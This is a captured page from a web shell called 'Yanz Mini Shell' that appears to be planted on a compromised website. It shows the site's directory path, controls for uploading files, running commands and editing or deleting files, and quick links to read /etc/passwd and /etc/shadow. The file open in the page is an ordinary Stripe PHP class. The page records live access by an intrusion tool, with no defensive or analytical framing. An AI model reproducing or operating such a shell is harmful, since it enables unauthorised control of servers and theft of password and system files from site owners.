Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php namespace Stripe; /** * Class RequestTelemetry * * Tracks client request telemetry * @package Stripe */ class RequestTelemetry { public $requestId; public $requestDuration; /** * Initialize a new telemetry object. * * @param string $requestId The request's request ID. * @param int $requestDuration The request's duration in milliseconds. */ public function __construct($requestId, $requestDuration) { $this->requestId = $requestId; $this->requestDuration = $requestDuration; } }
Free Space : 11956264960 Byte